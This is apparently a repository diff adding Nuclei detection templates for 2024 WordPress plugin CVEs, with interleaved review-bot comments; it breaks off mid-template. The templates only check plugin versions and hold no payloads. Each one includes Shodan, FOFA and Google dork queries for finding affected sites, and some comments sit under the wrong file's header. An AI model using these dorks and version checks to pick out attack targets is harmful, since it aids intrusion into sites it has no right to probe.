inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-43296' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.30') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml b/poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml new file mode 100644 index 0000000000..e8ac550e1c --- /dev/null +++ b/poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01 + +info: + name: > + White Label CMS <= 2.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The White Label CMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8069e16d-a68a-4c72-934f-f79e50777565?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43303 + metadata: + fofa-query: "wp-content/plugins/white-label-cms/" + google-query: inurl:"/wp-content/plugins/white-label-cms/" + shodan-query: 'vuln:CVE-2024-43303' + tags: cve,wordpress,wp-plugin,white-label-cms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "white-label-cms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml b/poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml new file mode 100644 index 0000000000..4cb59f7a74 --- /dev/null +++ b/poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43306-f131b00187e803d708a0f231c364afbd + +info: + name: > + WP-Lister Lite for eBay <= 3.6.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP-Lister Lite for eBay plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76ded81-4c78-4054-9a26-7e215285a2b6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43306 + metadata: + fofa-query: "wp-content/plugins/wp-lister-for-ebay/" + google-query: inurl:"/wp-content/plugins/wp-lister-for-ebay/" + shodan-query: 'vuln:CVE-2024-43306' + tags: cve,wordpress,wp-plugin,wp-lister-for-ebay,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-lister-for-ebay/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-lister-for-ebay" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml b/poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml new file mode 100644 index 0000000000..7d2ff73f5c --- /dev/null 
+++ b/poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3 + +info: + name: > + Structured Content <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908e4755-e439-4714-b0cb-3fc546c5ac63?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43307 + metadata: + fofa-query: "wp-content/plugins/structured-content/" + google-query: inurl:"/wp-content/plugins/structured-content/" + shodan-query: 'vuln:CVE-2024-43307' + tags: cve,wordpress,wp-plugin,structured-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/structured-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "structured-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml b/poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml new file mode 100644 index 0000000000..f1cedc13f0 
--- /dev/null +++ b/poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74 + +info: + name: > + Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43308 + metadata: + fofa-query: "wp-content/plugins/gutentor/" + google-query: inurl:"/wp-content/plugins/gutentor/" + shodan-query: 'vuln:CVE-2024-43308' + tags: cve,wordpress,wp-plugin,gutentor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gutentor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml b/poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml new file mode 100644 index 0000000000..927c333199 --- /dev/null +++ b/poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2
+
+info:
+ name: >
+ WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Telegram Widget and Join Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43309
+ metadata:
+ fofa-query: "wp-content/plugins/wptelegram-widget/"
+ google-query: inurl:"/wp-content/plugins/wptelegram-widget/"
+ shodan-query: 'vuln:CVE-2024-43309'
+ tags: cve,wordpress,wp-plugin,wptelegram-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wptelegram-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.27')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml b/poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml
new file mode 100644
index 0000000000..fc344b9f3c
--- /dev/null
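Review bot: The `word` matcher requires the literal string `wptelegram-widget` in the readme.txt body, but a plugin readme is not guaranteed to repeat its directory slug, so a genuinely installed plugin could fail this matcher even though the request path has already pinned the plugin. A marker the extractor already depends on, e.g. `- "Stable tag:"`, would keep the soft-404 guard without that false-negative risk. The same slug-in-body matcher is used in the other templates in this commit, most noticeably for long hyphenated slugs such as `responsive-block-editor-addons` and `page-builder-add`.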
+++ b/poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9
+
+info:
+ name: >
+ Login As Users <= 1.4.2 - Authentication Bypass
+ author: topscoder
+ severity: critical
+ description: >
+ The Login As Users plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.2. This is due to the plugin not properly verifying that a user switching back to a user is authorized to do so. This makes it possible for unauthenticated attackers to access other users accounts which can be administrators.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43311
+ metadata:
+ fofa-query: "wp-content/plugins/login-as-users/"
+ google-query: inurl:"/wp-content/plugins/login-as-users/"
+ shodan-query: 'vuln:CVE-2024-43311'
+ tags: cve,wordpress,wp-plugin,login-as-users,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "login-as-users"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml b/poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml
new file mode 100644
index 0000000000..346cdee157
--- /dev/null
+++ b/poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f
+
+info:
+ name: >
+ FormFacade <= 1.3.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The FormFacade – WordPress plugin for Google Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirectURL' parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0166c9-1349-45df-9e0f-ff4bc1a67c73?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43313
+ metadata:
+ fofa-query: "wp-content/plugins/formfacade/"
+ google-query: inurl:"/wp-content/plugins/formfacade/"
+ shodan-query: 'vuln:CVE-2024-43313'
+ tags: cve,wordpress,wp-plugin,formfacade,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/formfacade/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "formfacade"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml b/poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml
new file mode 100644
index 0000000000..9c986e2a46
--- /dev/null
+++ b/poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d
+
+info:
+ name: >
+ e2pdf <= 1.25.05 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The e2pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.25.05 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f94a1671-11f8-4a05-b950-a068edf29f43?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43318
+ metadata:
+ fofa-query: "wp-content/plugins/e2pdf/"
+ google-query: inurl:"/wp-content/plugins/e2pdf/"
+ shodan-query: 'vuln:CVE-2024-43318'
+ tags: cve,wordpress,wp-plugin,e2pdf,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e2pdf/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "e2pdf"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.25.05')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml b/poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
new file mode 100644
index 0000000000..7b91ea19d5
--- /dev/null
+++ b/poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+ The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.31 via the h5vp_export_data() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract potentially sensitive information from exports.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43319
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:CVE-2024-43319'
+ tags: cve,wordpress,wp-plugin,html5-video-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.31')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml b/poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml
new file mode 100644
index 0000000000..093b8563f2
--- /dev/null
+++ b/poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml
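Review bot: `name` calls the plugin `Flash & HTML5 Video` while `description` calls it `HTML5 Video Player – mp4 Video Player Plugin and Block` and the request path uses `html5-video-player`, so scan output and the readme being checked will not agree on what was found. I cannot tell from the hunk which name is current; if the plugin was renamed, `name` should use the current title, e.g. `HTML5 Video Player <= 2.5.31 - Authenticated (Subscriber+) Information Exposure`, or mention both.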
@@ -0,0 +1,59 @@
+id: CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f
+
+info:
+ name: >
+ Team Showcase <= 1.22.23 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.22.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f702fef0-8f07-4c94-bbf7-394d66f9ddde?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43321
+ metadata:
+ fofa-query: "wp-content/plugins/team/"
+ google-query: inurl:"/wp-content/plugins/team/"
+ shodan-query: 'vuln:CVE-2024-43321'
+ tags: cve,wordpress,wp-plugin,team,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/team/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "team"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.22.23')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml b/poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml
new file mode 100644
index 0000000000..0905e20f53
--- /dev/null
+++ b/poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml
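Review bot: The `word` matcher here is `"team"`, which almost any readme or catch-all page contains, so with `redirects: true` a site that answers 200 for unknown paths passes the first two matchers of this template. The `dsl` matcher should then fail because no `Stable tag:` value is extracted, which probably contains the false positive, but a more specific body string (the plugin's `=== ` readme title line, or `Stable tag:`) would make the guard explicit rather than incidental.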
@@ -0,0 +1,59 @@
+id: CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f
+
+info:
+ name: >
+ Zephyr Project Manager <= 3.3.100 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The Zephyr Project Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.100 via the updateTaskStatus() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to edit task statuses that do not belong to them.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/98a73a02-33fa-4dd4-9606-3d35d58c2398?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43322
+ metadata:
+ fofa-query: "wp-content/plugins/zephyr-project-manager/"
+ google-query: inurl:"/wp-content/plugins/zephyr-project-manager/"
+ shodan-query: 'vuln:CVE-2024-43322'
+ tags: cve,wordpress,wp-plugin,zephyr-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zephyr-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.100')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml b/poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml
new file mode 100644
index 0000000000..9cfb56519e
--- /dev/null
+++ b/poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml
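Review bot: `description` says the flaw is reachable by `unauthenticated attackers`, while `name` says `Authenticated (Subscriber+)` and `cvss-metrics` carries `PR:L`; one of the three is wrong and anyone triaging by required privilege will be misled. The same sentence also reads `via the updateTaskStatus() due to missing validation`, which is missing a noun. If the name and vector are the ones to trust, the description should read `via the updateTaskStatus() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit task statuses that do not belong to them.`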
@@ -0,0 +1,59 @@
+id: CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b
+
+info:
+ name: >
+ Invite Anyone <= 1.4.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Invite Anyone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b02613dc-8c31-4c86-b800-eb1039381e1f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43327
+ metadata:
+ fofa-query: "wp-content/plugins/invite-anyone/"
+ google-query: inurl:"/wp-content/plugins/invite-anyone/"
+ shodan-query: 'vuln:CVE-2024-43327'
+ tags: cve,wordpress,wp-plugin,invite-anyone,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/invite-anyone/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "invite-anyone"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml b/poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml
new file mode 100644
index 0000000000..ed7bd6137f
--- /dev/null
+++ b/poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242
+
+info:
+ name: >
+ EmbedPress <= 4.0.9 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The EmbedPress – Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.9 via the 'page_type' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a1b117-945f-49bc-9ea1-313afa93bf32?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43328
+ metadata:
+ fofa-query: "wp-content/plugins/embedpress/"
+ google-query: inurl:"/wp-content/plugins/embedpress/"
+ shodan-query: 'vuln:CVE-2024-43328'
+ tags: cve,wordpress,wp-plugin,embedpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "embedpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml b/poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml
new file mode 100644
index 0000000000..2299c7166c
--- /dev/null
+++ b/poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f
+
+info:
+ name: >
+ WP SMS <= 6.9.3 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
